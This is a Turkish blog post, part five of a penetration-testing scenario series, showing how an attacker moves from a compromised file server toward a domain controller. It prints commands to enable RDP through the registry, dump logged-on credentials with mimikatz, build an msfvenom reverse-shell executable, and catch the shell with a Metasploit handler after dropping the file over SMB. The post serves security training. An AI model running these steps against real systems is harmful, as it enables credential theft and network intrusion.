Sızma Testi Senaryosu - Bölüm 5

Merhabalar,

Bilindiği üzeri bir önceki konumda yani Sızma Testi Senaryosu-4'de temel bir firma topoloji yapmıştım ve hedefimiz FILE SERVER'dı. Şimdi ise FILESERVER üzerinden DC (Domain Controller'a) sızacağız..

İlk olarak FILESERVER'dan almış olduğumuz shell satırına bir regedit komutu yazıyoruz bunu yazma amacımız fileserver'i RDP'ye açmaktaktır.
Komut: reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
Şimdi ise "Senaryo 4'de" ele geçirmiş olduğumuz kullanıcı adı ve şifre ile fileserver'a rdp bağlantısı yapıyoruz. Bunun için kali üzerinde bulunan "rdesktop" tool'unu kullanacağız, öncelikle "rdesktop -u <KullanıcıAdı> -d " şeklinde bağlantı gerçekleştiriyoruz.
Şimdi ise browseri açıp https://github.com/gentilkiwi/mimikatz/releases/tag/2.1.0-20170121 adresinden "mimikatz_trunk.zip" adlı dosyayı indiriyoruz, ve rardan çıkartıyoruz işletim sistemimiz kaç bitse ona uygun olan dizine giriyoruz ve mimikatz.exe'yi çalıştırıyoruz. Ardından ise "privilege::debug" komutunu çalıştırıyoruz ve "sekurlsa::logonPasswords full" komutunu çalıştırarak daha önceden oraya login olan kullanıcaların passwordlerini alıyoruz, görüldüğü gibi enes.aslanbakan adında bir kullanıcı bulunmakta ve internette bazı araştırmalarımızda linkedinde sistem yöneticisi olduğunu yazmış (Sadece örnek bir bilgi toplama senaryosu, saldırgan gibi bakacak olursak hedef sistem hakkında bilgi toplarken çalışanlarda araştırılır. Düşünsenize 10 tane user profili var hangisi DoaminAdmin nereden bileceksiniz ve hepsini tek tek denemek yerine kurbanın yazdığı title sayesinde sistemdeki yetkili kullanıcıyı bulmuş olduk) herneyse görüldüğü gibi password'ü "password1".
Şimdi ise bir konsol ekranı açarak payload oluşturuyoruz, kullanacağımız komut " msfvenom -p windows/meterpeter/reverse_tcp LHOST= LPORT= -f exe -a x86 --platform windows -o /root/Desktop/isim.exe "

-p "PAYLOAD belirtilir"
-f "bat,exe, vb uzantı belirtilir"
-a "32 bit veya 64 bit'temi çalışacağı belirtilir"
--platform "linux, windows hangi OS'da çalıştırılacağı belirtilir."
-o hangi dizine kayıt edileceği belirtilir."
Şimdi ise terminal satırından "msfconsole" komutu ile metasploit açılır ve oluşturulan payloadtan gelecek bağlantı dinlemeye alınır. Bunun için "use exploit/multi/handler" , "set LHOST " , "set LPORT" son olarak "run" komutu ile dinlemeye alınır.
Şimdi ise oluşturulan payload'ı karşı tarafa atmamız gerekiyor. Bunun için kalinin network bölümünden SMB bağlantısı yapacağız ip adresini yazıyoruz ve username, password yazarak login oluyoruz ve kullanıcının dizinine girerek desktop klasörüne atıyoruz.
Ve görüldüğü gibi bağlantımız gelmiş,sistemi ele geçirmiş olduk..
Evet arkadaşlar görüldüğü gibi FILESERVER'a daha önceden login olmuş kullanıcıların profilleri sayesinden passwordleri dump ederek diğer sisteme payload oluşturarak ele geçirdik. Buyüzden birmaların maximum 2 ayda parolalarını değiştirmeleri gerekmektirdir. Neden 2 ay ? eğer zor bir parola ise kırılması 1 veya 2 ay sürecektir, 2.ayda saldırgan login olmak istediği zaman parola geçersiz diyecektir çünkü parolanızın süresi dolduğu için sizde değiştirmiş olacaksınız ve saldırgan login olamadığı için deli olacak :)

Bir sonraki makalede görüşmek üzeri..
Güvenli Günler,

Yorumlar

Bu blogdaki popüler yayınlar

MS17-010 Zafiyetiden Faydalanarak Domain Controller Ele Geçirme

Hydra İle BruteForce Attack Yaparak Nasil Hotmail/Gmail/Yahoo Şifreleri Kırılır ( Hacking )

Sızma Testi Senaryosu - Bölüm 1